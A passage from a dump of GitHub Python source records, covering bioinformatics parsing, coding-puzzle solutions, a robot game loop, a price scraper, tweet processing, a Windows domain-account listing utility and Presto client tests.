hit\n\n\ndef make_line2key(field_names):\n def line2key(line):\n fields = {key: value for key, value in zip(field_names, line.rstrip('\\n').split('\\t'))}\n return fields['qppid'], fields['sppid']\n return line2key\n\n\nhsp_columns = {'qppid': str, 'qgnid': str,\n 'sppid': str, 'sgnid': str,\n 'length': int, 'nident': int, 'gaps': int,\n 'qlen': int, 'qstart': int, 'qend': int,\n 'slen': int, 'sstart': int, 'send': int,\n 'evalue': float, 'bitscore': float,\n 'index_hsp': lambda x: x == 'True',\n 'disjoint': lambda x: x == 'True',\n 'compatible': lambda x: x == 'True'}\nhit_columns = ['qppid', 'qgnid',\n 'sppid', 'sgnid',\n 'hspnum', 'chspnum',\n 'qlen', 'nqa', 'cnqa',\n 'slen', 'nsa', 'cnsa',\n 'bitscore']\nnum_processes = 2\n\n# Load genomes\nspids = []\nwith open('../config/genomes.tsv') as file:\n field_names = file.readline().rstrip('\\n').split('\\t')\n for line in file:\n fields = {key: value for key, value in zip(field_names, line.rstrip('\\n').split('\\t'))}\n spids.append(fields['spid'])\n\n# Parse HSPs\nif __name__ == '__main__':\n with mp.Pool(processes=num_processes) as pool:\n pool.starmap(parse_file, permutations(spids, 2))\n\n\"\"\"\nDEPENDENCIES\n../config/genomes.tsv\n../blast2hsps/blast2hsps.py\n ../blast2hsps/out/hsps/*/*.tsv\n\"\"\"","repo_name":"marcsingleton/orthology_inference2023","sub_path":"analysis/ortho_search/hsps2hits/hsps2hits.py","file_name":"hsps2hits.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"11008563071","text":"from deeplearning.ml4pl.graphs import programl\nfrom deeplearning.ml4pl.graphs.unlabelled import (\n unlabelled_graph_database_exporter,\n)\nfrom labm8.py import app\nfrom labm8.py import progress\n\napp.DEFINE_output_path(\n \"outdir\",\n \"/tmp/phd/ml4pl/graphs\",\n \"The directory to write output files to.\",\n is_dir=True,\n)\napp.DEFINE_enum(\n \"fmt\",\n programl.StdoutGraphFormat,\n programl.StdoutGraphFormat.PB,\n \"The file type for graphs to dump.\",\n)\napp.DEFINE_integer(\n \"batch_size\",\n 1024,\n \"Tuning parameter. The number of graphs to read in a batch.\",\n)\nFLAGS = app.FLAGS\n\n\ndef Main():\n \"\"\"Main entry point.\"\"\"\n exporter = unlabelled_graph_database_exporter.GraphDatabaseExporter(\n db=FLAGS.proto_db(),\n outdir=FLAGS.outdir,\n fmt=FLAGS.fmt(),\n batch_size=FLAGS.batch_size,\n )\n\n progress.Run(exporter)\n\n\nif __name__ == \"__main__\":\n app.Run(Main)\n","repo_name":"ChrisCummins/phd","sub_path":"deeplearning/ml4pl/cmd/dump_unlabelled_graph_db.py","file_name":"dump_unlabelled_graph_db.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":181,"dataset":"github-code","pt":"67"} +{"seq_id":"31414321957","text":"class Solution:\n def addStrings(self, num1, num2):\n if len(num1) <= len(num2):\n short_num, long_num = num1, num2\n else:\n short_num, long_num = num2, num1\n\n sum_times = len(short_num)\n result = ''\n divisor = 0\n for i in range(-1, -(sum_times+1), -1):\n _sum = int(short_num[i]) + int(long_num[i]) + divisor\n\n divisor = _sum // 10\n remainder = _sum % 10\n\n result = str(remainder) + result\n\n # 另外,这里也可以直接在短的字符串前补零操作,对齐\n for i in range(-(sum_times+1), -(len(long_num)+1), -1):\n if divisor == 0:\n return long_num[:i+1] + result\n _sum = int(long_num[i]) + divisor\n\n divisor = _sum // 10\n remainder = _sum % 10\n\n result = str(remainder) + result\n if divisor != 0:\n result = str(divisor) + result\n return result\n\n\ns = Solution()\nprint(s.addStrings('3824008', '92520'))\nprint(s.addStrings('1', '9'))\n\n","repo_name":"yangwei-nlp/LeetCode-Python","sub_path":"LeetCode/tag字符串/415. 字符串相加.py","file_name":"415. 字符串相加.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30228048242","text":"from collections import deque\n\n\ndef in_hole(pos, target):\n return pos[0] == target[0] and pos[1] == target[1]\n\n\ndef in_boundary(r, c, board):\n N = len(board)\n M = len(board[0])\n\n return 0 <= r < N and 0 <= c < M\n\n\ndef move_to_end(r, c, dr, dc, board):\n nr, nc = r + dr, c + dc\n counter = 0\n while in_boundary(nr, nc, board) and board[nr][nc] == '.':\n r, c = nr, nc\n nr, nc = r + dr, c + dc\n counter += 1\n\n if in_boundary(nr, nc, board) and board[nr][nc] == 'O':\n r, c = nr, nc\n\n return r, c, counter\n\n\ndef move_ball(rr, rc, br, bc, dr, dc, board):\n nrr, nrc, rcnt = move_to_end(rr, rc, dr, dc, board)\n nbr, nbc, bcnt = move_to_end(br, bc, dr, dc, board)\n\n if nrr == nbr and nrc == nbc:\n if board[nrr][nrc] != 'O':\n if rcnt > bcnt:\n nrr, nrc = nrr - dr, nrc - dc\n elif rcnt < bcnt:\n nbr, nbc = nbr - dr, nbc - dc\n\n return (nrr, nrc), (nbr, nbc)\n\n\ndef solution(board):\n N = len(board)\n M = len(board[0])\n\n red_pos = tuple()\n blue_pos = tuple()\n hole_pos = tuple()\n\n for r in range(N):\n for c in range(M):\n if board[r][c] == 'R':\n red_pos = (r, c)\n board[r][c] = '.'\n elif board[r][c] == 'B':\n blue_pos = (r, c)\n board[r][c] = '.'\n elif board[r][c] == 'O':\n hole_pos = (r, c)\n\n counter = 0\n queue = deque([(red_pos, blue_pos, counter)])\n visited = set()\n blue_hole = False\n while queue:\n item = queue.popleft()\n red_pos = item[0]\n blue_pos = item[1]\n counter = item[2]\n\n if (red_pos, blue_pos) in visited:\n continue\n visited.add((red_pos, blue_pos))\n\n # Break Case\n if counter > 10:\n return -1\n if in_hole(blue_pos, hole_pos):\n blue_hole = True\n continue\n if in_hole(red_pos, hole_pos) and not in_hole(blue_pos, hole_pos):\n blue_hole = False\n break\n\n # D - U - R - L\n for dr, dc in zip((1, -1, 0, 0), (0, 0, 1, -1)):\n rr, rc = red_pos\n br, bc = blue_pos\n\n next_red_pos, next_blue_pos =\\\n move_ball(rr, rc, br, bc, dr, dc, board)\n item = (next_red_pos, next_blue_pos, counter+1)\n queue.append(item)\n\n rr, rc = red_pos\n answer = counter if board[rr][rc] == 'O' and not blue_hole else -1\n return answer\n\n\n# File Input\nif __name__ == \"__main__\":\n board, answer = None, None\n\n f = open('삼성 SW 역량 테스트 기출 문제/inputs/구슬 탈출 2.txt', 'r')\n T = int(f.readline())\n\n for t in range(T):\n N, M = map(lambda x: int(x), f.readline().split())\n board = [['.'] * M for _ in range(N)]\n for r in range(N):\n line = f.readline()\n line = line.strip()\n for c, val in enumerate(line):\n board[r][c] = val\n answer = int(f.readline())\n\n my_answer = solution(board)\n assert my_answer == answer\n print(f'{t+1:02} 번 문제 성공')\n\n f.close()\n\n# Standard Input for Submission\n# if __name__ == \"__main__\":\n# N, M = map(lambda x: int(x), input().split())\n# board = [list(input().rstrip()) for _ in range(N)]\n# answer = solution(board)\n# print(answer)\n","repo_name":"coco-in-bluemoon/baekjoon-online-judge","sub_path":"삼성 SW 역량 테스트 기출 문제/구슬 탈출 2.py","file_name":"구슬 탈출 2.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28729169409","text":"\"\"\"\nwindows域相关操作\n\npython3.7\n\"\"\"\n\nimport subprocess\n\n\nclass Domain(object):\n def __init__(self):\n self.accounts = []\n\n def obtain_accounts(self):\n # 获取域账号列表\n result = subprocess.Popen('net users /domain', shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n result_lines = result.stdout.readlines()\n for line in result_lines:\n line = line.decode('gbk').strip()\n # windows自带的输出提示里也有空格(1个),这些是我们不需要的,域账号之间的空格超过两个,\n # 故用双空格来判断是否是我们想要的输出行\n if ' ' in line:\n line_domains = [d for d in line.split() if d]\n self.accounts += line_domains\n\n def get_accounts(self):\n return self.accounts\n\n def print_account(self):\n print(\"domain accounts: \")\n print(self.accounts)\n\n\nif __name__ == '__main__':\n ac = Domain()\n ac.obtain_accounts()\n ac.print_account()\n\n","repo_name":"alvinyeats/MiniScripts","sub_path":"windows/domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24654282015","text":"import os\n\n# change to dir that holds the files\n\nos.chdir('/Users/jakks/Desktop/test')\nprint(os.getcwd())\n\nfor f in os.listdir():\n file_name, file_ext = os.path.splitext(f)\n print(file_name.split('-'))\n var1, var2, var3 = file_name.split('-')\n print(var1, var2, var3)","repo_name":"jakkrits/python-cookbook","sub_path":"0-File-Rename.py","file_name":"0-File-Rename.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10287772116","text":"import unittest\nimport tempfile\nfrom .torch_dataset import TorchDataset \nfrom recordio import File\n\n\nclass TestTorchDataset(unittest.TestCase):\n \"\"\" Test torch_dataset.py\n \"\"\"\n\n def test_dataset(self):\n data_source = [\n b'china',\n b'usa',\n b'russia',\n b'india',\n b'thailand',\n b'finland',\n b'france',\n b'germany',\n b'poland',\n b'san marino',\n b'sweden',\n b'neuseeland',\n b'argentina',\n b'canada',\n b'ottawa',\n b'bogota',\n b'panama',\n b'united states',\n b'brazil',\n b'barbados']\n\n # this tmp file will be closed in File.close()\n tmpfile_name = tempfile.NamedTemporaryFile().name\n with File(tmpfile_name, 'w') as rdio_w:\n for data in data_source:\n rdio_w.write(data)\n\n with TorchDataset(tmpfile_name) as dataset:\n self.assertEqual(list(dataset), list(data_source))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"elasticdl/pyrecordio","sub_path":"recordio/torch_dataset/torch_dataset_test.py","file_name":"torch_dataset_test.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"14610674825","text":"PRIORITY = {\"*\": 3, \"/\": 3, \"+\": 2, \"-\": 2, \"(\": 1}\n\n\ndef brackets_trim(input_data: str) -> str:\n return postfix_to_infix(infix_to_postfix(input_data))\n\n\ndef infix_to_postfix(expr):\n\n stack = []\n postfix_list = []\n tokens = expr.replace(' ', '')\n\n try:\n for tkn in tokens:\n if tkn.isalpha():\n postfix_list.append(tkn)\n elif tkn == '(':\n stack.append(tkn)\n elif tkn == ')':\n top_tkn = stack.pop()\n while top_tkn != '(':\n postfix_list.append(top_tkn)\n top_tkn = stack.pop()\n elif tkn in PRIORITY.keys():\n while len(stack) != 0 and PRIORITY[stack[-1]] >= PRIORITY[tkn]:\n postfix_list.append(stack.pop())\n stack.append(tkn)\n except IndexError:\n return 'Check the correctness of the input expression.'\n\n while len(stack) != 0:\n postfix_list.append(stack.pop())\n\n return ' '.join(postfix_list)\n\n\ndef postfix_to_infix(postfix_list):\n stack = []\n\n try:\n for tkn in postfix_list:\n if tkn.isalpha():\n stack.append(tkn)\n elif tkn in PRIORITY.keys():\n operand2 = stack.pop()\n operand1 = stack.pop()\n\n # check PRIORITY\n if is_operand_priority_lower(operand1, tkn, 1):\n operand1 = '( {} )'.format(operand1)\n if is_operand_priority_lower(operand2, tkn, 2):\n operand2 = '( {} )'.format(operand2)\n\n stack.append('{} {} {}'.format(operand1, tkn, operand2))\n\n return stack.pop()\n\n except IndexError:\n return 'Check the correctness of the input expression.'\n\n\ndef is_operand_priority_lower(operand, operator, operand_num):\n i = 0\n while i < len(operand):\n if operand[i] == '(':\n while operand[i] != ')':\n i += 1\n\n if operand[i] in PRIORITY.keys():\n if PRIORITY[operand[i]] < PRIORITY[operator]:\n return True\n\n elif operand_num == 2 and PRIORITY[operand[i]] == PRIORITY[operator]:\n # case of - (-) or - (+). E.g. a-(b-c) or a-(b+c)\n if operator == '-' and (operand[i] == '-' or operand[i] == '+'):\n return True\n # case of / (*). E.g. a/(b*c)\n elif operator == '/' and operand[i] == '*':\n return True\n i += 1\n\n return False\n\n\nif __name__ == '__main__':\n print(brackets_trim(\"(x*y)+(j*z)+g\"))\n","repo_name":"annkupriyanova/epam_python_course","sub_path":"Iterators_Generators/hw4.py","file_name":"hw4.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30631593830","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport time\nfrom Role import *\nfrom Move import movement\nfrom Choose import choose_workbench, free_ride_bussiness\n\n\nschedule = Schedule()\n\n\ndef start_task(job):\n if job is None:\n return\n if job.speed_linear != robots[job.key[0]].speed_linear[0]:\n robots[job.key[0]].forward(job.speed_linear)\n if job.speed_angular != robots[job.key[0]].speed_angular:\n robots[job.key[0]].rotate(job.speed_angular)\n\n\ndef stop_task(job):\n if robots[job.key[0]].speed_linear != 0:\n robots[job.key[0]].forward(0)\n if robots[job.key[0]].speed_angular != 0:\n robots[job.key[0]].rotate(0)\n\n\ndef clear_task(job):\n del_all_request()\n\n\ndef process():\n # log(collision_detection([robot.get_pos() for robot in robots]))\n choose_workbench_time = 0\n movement_time = 0\n for robot in robots:\n # if robot.rid != 0:\n # continue\n if robot.is_busy():\n '''修正过程'''\n bid = robot.get_job()[0]\n start = time.time()\n start_time, stop_time, line_speed, angular_speed = movement(robot.rid, bid)\n movement_time += time.time() - start\n schedule.add_job(Job(frame_id, robot.rid, robot.get_job(), angular_speed, line_speed, start_task))\n continue\n # 选择平台,总共两个阶段\n start = time.time()\n job_1, job_2 = choose_workbench(robot.rid)\n log(\"robot recv job : \" + str((job_1, job_2)))\n choose_workbench_time += time.time() - start\n if job_1 is None or job_2 is None:\n schedule.add_job(Job(frame_id + 100, robot.rid, None, 0, 0, stop_task))\n continue\n # 进行线速度和角速度计算, 并添加任务,计算第一个阶段\n start = time.time()\n start_time, stop_time, line_speed, angular_speed = movement(robot.rid, job_1[0])\n movement_time += time.time() - start\n schedule.add_job(Job(frame_id, robot.rid, job_1, angular_speed, line_speed, start_task))\n robot.add_job([job_1, job_2]) # 表示工作忙, 0 在bench_id1买x号产品,1 在bench_id2卖\n if choose_workbench_time != 0:\n log(\"choose_workbench()结束耗时:\" + str(choose_workbench_time))\n log(\"movement()结束耗时:\" + str(movement_time))\n\n\ndef busy_to_idle_func(rid):\n schedule.add_job(Job(frame_id, rid, None, math.pi / 4, 3, start_task))\n\n\ndef notify_product_update(bid, pid):\n for robot in robots:\n if robot.can_recv_job():\n # log(str(robot.rid) + \" \" + str(robot.get_final_bench_1()[0]) + \" \" + str(bid) + \" \" + str(pid))\n job_1, job_2 = free_ride_bussiness(robot.rid, bid, pid)\n if job_1 is None or job_2 is None:\n continue\n robot.insert_job([job_1, job_2], pos=1)\n log(\"robot \" + str(robot.rid) + \" add new job, current job is : \" + str(robot.jobs))\n\n\ndef init_env():\n graph = input_data()\n log(\"初始化:\", True)\n bw = graph_width / len(graph[0]) / 2.0\n bench_id = 0\n robot_id = 0\n for x, line in enumerate(graph):\n for y, ch in enumerate(line):\n if ch.isdigit():\n w = Workbench(bench_id, int(ch), 0.5 * y + bw, 49.75 - 0.5 * x, notify_product_update)\n workbenches_category[int(ch)].append(bench_id)\n workbenches.append(w)\n bench_id += 1\n elif \"A\" == ch:\n robots.append(Robot(robot_id, 0.5 * y + bw, 49.75 - 0.5 * x, busy_to_idle_func))\n robot_id += 1\n for bi, bench in enumerate(bench_raw_map):\n for pi in bench:\n buyer[pi].extend(workbenches_category[bi])\n\n for bid_1 in range(len(workbenches)):\n bench_1 = workbenches[bid_1]\n for bid_2 in range(bid_1 + 1, len(workbenches)):\n bench_2 = workbenches[bid_2]\n bench_bw_dis[(bench_1.bid, bench_2.bid)] = distance_o(bench_1.get_pos(), bench_2.get_pos())\n schedule.add_job(Job((duration * 60 - 7) * fps, 74, 74, 0, 0, clear_task))\n finish()\n\n\ndef input_data():\n venue = []\n while True:\n line = sys.stdin.readline().strip('\\n')\n if \"OK\" == line:\n break\n elif \"\" == line:\n log(\"Total transaction times : \" + str(transactions_times))\n sys.exit(0)\n venue.append(line)\n return venue\n\n\ndef update_venue(data):\n global money, frame_id\n parser_arr = list(map(int, data[0].split(\" \")))\n frame_id, money = parser_arr[0], parser_arr[1]\n bench_cnt = int(data[1])\n line_cnt = 2\n for index in range(bench_cnt):\n parser_arr = list(map(float, data[line_cnt].split(\" \")))\n workbenches[index].update(parser_arr)\n line_cnt += 1\n for index in range(robot_size):\n parser_arr = list(map(float, data[line_cnt].split(\" \")))\n robots[index].update(parser_arr)\n line_cnt += 1\n\n\ndef output_result():\n log(\"传递指令开始---\")\n sys.stdout.write('%d\\n' % frame_id)\n log('%d' % frame_id)\n for robot in robots:\n for action, value in robot.action_list.items():\n sys.stdout.write('%s %s\\n' % (action, ' '.join(str(v) for v in value)))\n log('%s %s' % (action, ' '.join(str(v) for v in value)))\n robot.action_list.clear()\n finish()\n log(\"传递指令结束---\")\n\n\ndef finish():\n sys.stdout.write('OK\\n')\n sys.stdout.flush()\n\n\n# ----------------------------------------\n# 交互主体逻辑\n# ----------------------------------------\ndef interact():\n data = input_data()\n start = time.time()\n update_venue(data)\n log(\"update_venue()结束耗时:\" + str(time.time() - start))\n start = time.time()\n log(\"第%d帧:\" % frame_id)\n s = \"平台需要售卖\"\n for pid in request_form[0]:\n s += \"\\npid: \" + str(pid) + \" bid: \"\n for bid in request_form[0][pid]:\n s += str(bid) + \" \"\n s += \"\\n平台需要购买\"\n for pid in request_form[1]:\n s += \"\\npid: \" + str(pid) + \" bid: \"\n for bid in request_form[1][pid]:\n s += str(bid) + \" \"\n log(s)\n log(request_form)\n # log(\"category_type_workbench :\" + str(\n # [[wb.bid for wb in workbenches_category[i]] for i in range(len(workbenches_category))]))\n log(\"interval结束耗时:\" + str(time.time() - start))\n start = time.time()\n process()\n log(\"process结束耗时:\" + str(time.time() - start))\n schedule.running(frame_id)\n output_result()\n total = time.time() - start\n log(\"结束耗时:\" + str(total))\n if total > 0.0149:\n log(\"timeout\")\n\n\ninit_env()\nwhile True:\n interact()\n# ----------------------------------------\n","repo_name":"LYFU0814/HUAWEI-Planck","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10713897780","text":"\"\"\"\nGiven the head of a linked list, remove the nth node from the end of the list and return its head.\n\n \nExample 1:\n\nInput: head = [1,2,3,4,5], n = 2\nOutput: [1,2,3,5]\n\nExample 2:\n\nInput: head = [1], n = 1\nOutput: []\n\nExample 3:\n\nInput: head = [1,2], n = 1\nOutput: [1]\n \n\nConstraints:\nThe number of nodes in the list is sz.\n1 <= sz <= 30\n0 <= Node.val <= 100\n1 <= n <= sz\n\nFollow up: Could you do this in one pass?\n\"\"\"\n\n# Using 2 pointers\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def removeNthFromEnd(self, head: Optional[ListNode], n: int) -> Optional[ListNode]:\n # initialise 2 pointers\n fast = head\n slow = head\n # Set fast pointer to kth position\n # than the slow pointer \n for i in range(n):\n fast = fast.next\n \n # While the fast pointer is finished\n # The slow pointer will locate ate the position\n # where you'd like to remove\n while fast and fast.next:\n fast = fast.next\n slow = slow.next\n \n # fail to handle Example 2 and Example 3\n # I must ignored some condition\n slow.next = slow.next.next\n\n return head","repo_name":"Kaiyilin/LeetCode-Practice","sub_path":"two_pointers/RemoveNthNodeFromEndofList.py","file_name":"RemoveNthNodeFromEndofList.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31271776170","text":"# -*- coding: utf-8 -*-\n\nfrom lib.Parse.parseData import ParseData\nfrom lxml import html\nfrom config.shops import shops\nimport re\n\nclass ShopGunData(ParseData):\n __slots__ = [\n \"categories\",\n \"availableAmmo\",\n \"url\",\n \"urlTmp\",\n \"dataFile\",\n \"shopName\"\n ]\n def __init__(self):\n settings = shops[\"shopgun\"]\n\n self.shopName = settings[\"shop_name\"]\n self.categories = settings[\"ammo_type\"]\n self.availableAmmo = settings[\"category\"]\n self.url = settings[\"url\"]\n self.urlTmp = settings[\"url_tmp\"]\n self.dataFile = settings[\"data_file\"]\n\n def getStructure(self, url):\n result = []\n page = self.requestsUrllib2Page(url)\n blocks = page.xpath('.//div[@class=\"product\"]')\n\n for item in blocks:\n dic = {}\n nameBlock = item.xpath('.//div[@class=\"name\"]/a/text()')\n priceBlock = item.xpath('.//span[@class=\"price\"]/text()')\n\n if priceBlock:\n price = priceBlock[0]\n name = nameBlock[0].replace('\\n', '')\n calcPrice = self.cleanPriceNum(price);\n\n dic[\"title\"] = self.cleanTitle(name)\n dic[\"price\"] = round(calcPrice, 2)\n\n result.append(\n dict(dic)\n )\n\n return sorted(result, key=self.sortArrayByPrice)\n ","repo_name":"IRIDON/ammo-bot","sub_path":"lib/Parse/shopGunParse.py","file_name":"shopGunParse.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"74339510613","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n '''\n You are given two non-empty linked lists representing two non-negative integers. \n The digits are stored in reverse order and each of their nodes contain a single digit. \n Add the two numbers and return it as a linked list.\n You may assume the two numbers do not contain any leading zero, except the number 0 itself. \n '''\n lst1=self.linklist2list(l1)\n lst1.reverse()\n s1=''.join(lst1)\n num1=int(s1)\n lst2=self.linklist2list(l2)\n lst2.reverse()\n s2=''.join(lst2)\n num2=int(s2)\n sumnum=num1+num2\n lstsum=list(str(sumnum))\n lstsum.reverse()\n lstsum=[int(x) for x in lstsum]\n result=self.list2linklist(lstsum)\n return result\n \n \n def linklist2list(self,l1:ListNode)->list:\n np=l1\n nl=[]\n nl.append(str(l1.val))\n while np.next!=None:\n nl.append(str(np.next.val))\n np=np.next\n return nl\n \n def list2linklist(self,l1:list)->ListNode:\n node=result=ListNode(l1[0])\n for i in range(len(l1)-1):\n nxnode=ListNode(l1[i+1])\n node.next=nxnode\n node=nxnode\n return result\n '''\n abstract:\n turn the linklist to a list then to a int by using str() and .reverse(),finally turn the result back to ListNode\n '''\n","repo_name":"EmperorKaiser/Leetcode-Solution-Notes","sub_path":"002_Add_Two_Numbers.py","file_name":"002_Add_Two_Numbers.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72253055893","text":"import csv\n\n\ndef create_csv_for_2gis(goods: list):\n with open(\"classmates.csv\", mode=\"w\", encoding='utf-8') as csv_file:\n names = [\"name\", \"price\", \"category\", \"url\", \"picture\", \"description\"]\n file_writer = csv.DictWriter(csv_file, delimiter=\",\", lineterminator=\"\\r\", fieldnames=names)\n file_writer.writeheader()\n for good in goods:\n file_writer.writerow(good)\n # file_writer.writerow({\"Имя\": \"Вова\", \"Возраст\": \"14\"})\n\n\nif __name__ == '__main__':\n create_csv_for_2gis([\n {\"name\": \"Футболка\", \"price\": \"1\", \"category\": \"2\", \"url\": \"3\", \"description\": \"4\", \"picture\": \"5\"},\n ])\n","repo_name":"iparinile/backend_vinterr","sub_path":"helpers/csv/create_csv.py","file_name":"create_csv.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33611621697","text":"import sys\nimport json\n\n#set the path to the raw tweets file\ntweets_data_path = './tweets_raw_backup copy'\n\n#initialize an array and open the raw tweets file for reading\ntweets_data = []\ntweets_file = open(tweets_data_path, \"r\")\n\n#process each line in raw tweets file\nfor line in tweets_file:\n try:\n tweet = json.loads(line)\n #Get \"real\" name then user name\n try: \n real_name = (tweet['user']['name'])\n except:\n real_name = \"UNKNOWN\"\n try:\n user_name = (tweet['user']['screen_name'])\n except:\n user_name = \"UNKNOWN\"\n #Get follower count to determine top users \n try:\n followers_count = (tweet['user']['followers_count'])\n except:\n followers_count = \"UNKNOWN\"\n #Get Verified flag for context\n try:\n verified_status = (tweet['user']['verified'])\n except:\n verified_status = \"UNKNOWN\"\n #Get tweet as well as identify possible retweet and mark it as such\n try:\n text = tweet['text']\n text_form = []\n text_form.append(text)\n if text[0:4] == \"RT @\":\n re_tweet = \"YES\"\n else:\n re_tweet = \"NO\"\n except:\n text_form = []\n re_tweet = \"UNKNOWN\"\n #Get language of tweet\n try:\n lang = tweet['lang']\n except:\n lang = \"UNKNOWN\"\n #Get hashtags of tweet \n try:\n hashtags = ([tweet['entities']['hashtags'][i]['text'] for i in range(0,len(tweet['entities']['hashtags']))]) \n except:\n hashtags = \"UNKNOWN\"\n #Get url from tweet\n try:\n url = (tweet['entities']['urls'][0]['url'])\n except:\n url = \"UNKNOWN\"\n\n #Print all metrics into tab separated line\n #print([real_name,user_name,followers_count,verified_status,text,lang,hashtags,url])\n print(real_name + \"\\t\" + user_name + \"\\t\" + str(followers_count) + \"\\t\" + str(text_form) + \"\\t\" + re_tweet + \"\\t\" + lang + \"\\t\" + str(hashtags) + \"\\t\" + url)\n #print(str(text_form))\n tweets_data.append(tweet)\n \n except:\n continue\n \n \n#print how many tweets were processed\nprint (len(tweets_data))\n","repo_name":"KaiJeng/MSDS_Twitter_Trend","sub_path":"process_tweets.py","file_name":"process_tweets.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21223326898","text":"\"\"\"Presto integration tests.\nThese rely on having a Presto+Hadoop cluster set up.\nThey also require a tables created by make_test_tables.sh.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom tornado import gen\nfrom tornado.concurrent import Future\nfrom tornado.httpclient import HTTPResponse, HTTPRequest, AsyncHTTPClient\nfrom tornado.testing import AsyncTestCase, gen_test\nfrom prestornado.tests.dbapi_test_case import with_cursor, DBAPITestCase\nfrom prestornado import exc\nfrom prestornado import presto\nfrom StringIO import StringIO\nimport mock\nimport os\n\n_HOST = os.environ.get('PRESTO_HOST', 'localhost')\n\n\nclass TestPresto(AsyncTestCase, DBAPITestCase):\n\n def connect(self):\n return presto.connect(host=_HOST, source=self.id())\n\n def run_gen(self, f):\n f()\n return self.wait()\n\n def setup_fetch(self, fetch_mock, status_code, body=None):\n \"\"\"Copied from https://groups.google.com/forum/#!topic/python-tornado/LrXqiL6InTM\"\"\"\n def side_effect(request, **kwargs):\n if request is not HTTPRequest:\n request = HTTPRequest(request)\n buffer = StringIO(body)\n response = HTTPResponse(request, status_code, None, buffer)\n future = Future()\n future.set_result(response)\n return future\n fetch_mock.side_effect = side_effect\n\n @with_cursor\n @gen_test\n def test_description(self, cursor):\n yield cursor.execute('SELECT 1 AS foobar FROM one_row')\n # wait to finish\n while (yield cursor.poll()):\n pass\n self.assertEqual(cursor.description, [('foobar', 'bigint', None, None, None, None, True)])\n\n @with_cursor\n @gen_test\n def test_stats(self, cursor):\n yield cursor.execute('SELECT 1 AS foobar FROM one_row')\n # wait to finish\n while (yield cursor.poll()):\n pass\n self.assertIsInstance(cursor.stats, dict)\n\n @with_cursor\n @gen_test\n def test_query_id(self, cursor):\n yield cursor.execute('SELECT 1 AS foobar FROM one_row')\n # wait to finish\n while (yield cursor.poll()):\n pass\n self.assertIsNotNone(cursor.query_id)\n\n @with_cursor\n @gen_test\n def test_complex(self, cursor):\n yield cursor.execute('SELECT * FROM one_row_complex')\n # wait to finish\n while (yield cursor.poll()):\n pass\n # TODO Presto drops the union and decimal fields\n self.assertEqual(cursor.description, [\n ('boolean', 'boolean', None, None, None, None, True),\n ('tinyint', 'bigint', None, None, None, None, True),\n ('smallint', 'bigint', None, None, None, None, True),\n ('int', 'bigint', None, None, None, None, True),\n ('bigint', 'bigint', None, None, None, None, True),\n ('float', 'double', None, None, None, None, True),\n ('double', 'double', None, None, None, None, True),\n ('string', 'varchar', None, None, None, None, True),\n ('timestamp', 'timestamp', None, None, None, None, True),\n ('binary', 'varbinary', None, None, None, None, True),\n ('array', 'array', None, None, None, None, True),\n ('map', 'map', None, None, None, None, True),\n ('struct', \"row('a','b')\", None, None, None, None, True),\n #('union', 'varchar', None, None, None, None, True),\n #('decimal', 'double', None, None, None, None, True),\n ])\n data = yield cursor.fetchall()\n self.assertEqual(data, [[\n True,\n 127,\n 32767,\n 2147483647,\n 9223372036854775807,\n 0.5,\n 0.25,\n 'a string',\n '1970-01-01 08:00:00.000',\n '123',\n [1, 2],\n {\"1\": 2, \"3\": 4}, # Presto converts all keys to strings so that they're valid JSON\n [1, 2], # struct is returned as a list of elements\n #'{0:1}',\n #0.1,\n ]])\n\n def test_noops(self):\n \"\"\"The DB-API specification requires that certain actions exist, even though they might not\n be applicable.\"\"\"\n # Wohoo inflating coverage stats!\n connection = self.connect()\n cursor = connection.cursor()\n self.assertEqual(cursor.rowcount, -1)\n cursor.setinputsizes([])\n cursor.setoutputsize(1, 'blah')\n connection.commit()\n\n @mock.patch.object(AsyncHTTPClient, 'fetch')\n def test_non_200(self, fetch):\n self.setup_fetch(fetch, 404, '')\n cursor = self.connect().cursor()\n\n @gen.engine\n def f():\n yield cursor.execute('show tables')\n self.stop()\n\n 